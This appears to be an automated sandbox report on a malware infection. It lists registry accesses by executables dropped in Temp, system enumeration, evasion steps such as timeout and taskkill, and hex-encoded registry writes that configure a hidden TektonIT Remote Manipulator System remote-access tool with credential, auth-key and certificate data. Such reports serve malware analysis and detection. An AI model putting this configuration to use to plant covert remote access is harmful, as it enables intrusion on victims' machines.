Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\50to.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223730313230223e3c696e7465726e65745f69643e3334362d3331392d3834392d3533383c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f726d735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223730313230223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e5275737369616e3c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3661766a766755477a614d3d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e66616c73653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e66616c73653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e66616c73653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c6c6f675f7573655f77696e646f77733e66616c73653c2f6c6f675f7573655f77696e646f77733e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e5167413341444141526741774145494152414247414559414f41417a414445414e674242414545414e41417a41454d4152414132414551414f514131414559415251424341446b414e674179414545414f414134414430414e414130414451414e414130414334414e414178414451414e41417a414449414f414133414441414e41413d3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343538362e363131393838353138353c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349334d4445794d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e66616c73653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c636c6970626f6172645f7472616e736665725f6d6f64653e303c2f636c6970626f6172645f7472616e736665725f6d6f64653e3c636c6f73655f73657373696f6e5f69646c653e66616c73653c2f636c6f73655f73657373696f6e5f69646c653e3c636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e36303c2f636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e3c73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e66616c73653c2f73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\NetworkExplorer.dll,-1 = "Network" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\windows.storage.dll,-9216 = "This PC" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\ieframe.dll,-5723 = "The Internet" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223730313230223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465154553554323936515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c5674566e52694d314a735355557861474a746248646b5633686f5a45633565556c47546a566a4d314a73596c524661553144515564424d565646515864335767705662565a30596a4e5362456c464d576869625778335a466434614752484f586c4a526b3431597a4e5362474a5551575647647a423554577042654531715658684f524646345456526159555a334d48704e616b4634436b31715458684f52464634545652615955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73553170584d585a6b5231566e5646644764574659516a454b596b64474d47497a535764564d3278365a456457644531545358644a51566c45566c46525245524362464e61567a46325a4564565a315258526e566857454978596b64474d47497a535764564d3278365a4564576441704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651585a584e554a6e4d556b344f465246614374794e30644465576b7a436a6772526e6c6b6554565255554a56623349314e57705363455a7a55476c48654845354d6d3433626b6f3263545a36596d5a7852575269615770475347314d6347597a596d5a4a62486778566d5a43646c644e5254494b54475532617a426963303174546c5a525a32524361316f3152576435545568365658524a656e70554d6c6c4e5a584a315346426959584234596e4649646b7376566b4a4255485a685a6d3177525856315a6c41724c776f7a595870574e6a644952586f764e6b31495a6a685954474a484d57744e4d6e64785553744b5232745156586f3359577055554646484e6d687353564e76576a645a4d6d4e36516a4e465a697477515452784e6b744b436a5a35627a63316547743151793959537a567961573975645568585655524f4e6d4a5362545a794f484d334e7a644c516b73726557355262316c454e537469647a557264564231616d35564d556454626c6f316155554b4d6b6c76554441796247704964557055556b396e4e6b6f7664474e485157784a593352546130777865453146654746514d6c68444f484130645770494f44553555307874626a5257536d523152584579644468716141707655556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b465251554a546545303064555251654642336355637964537435546c6f3265584a585132553157564d31436d5a745a4846564d797430636d3573626e7058526d5176566d5a6d4f446b3354464650645531515154564264564e58596b686a4f5564506555685456464e4e4c3239544d334d775247524652697449656b78784d456f4b5457706a5356644c546d6c4e6333566a4d33704e52466c3259325a714d4578755556704c556d6b77546d3559596e424c63564d35626b466a59556c784d445245636e527061305a7a4d464d324c334d78546b52595a4170336431465065537456615568574d466f764e7a644e53585a7654335a304e6b395a4e31463652546c5a554452464d6b467a5a585a4463797476545556685446686d5632553355466c464d3234785169397a63545643436b316e64557079555568454e6d4e52616b74545a44466154326c764d31706f4e6c4a47556b70355a4535434e79396e4e6a6c68616c6c6c5a485a7965567071646d4e7264315a344e47356c55546b724b304d305a48554b65574e745957565463584e6a627a4a45564570465647646953304972576e4e71553074584d47396f516a5a6a636b683351337035535764525646687a646a56535648704264456c5a5432514b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a535556325a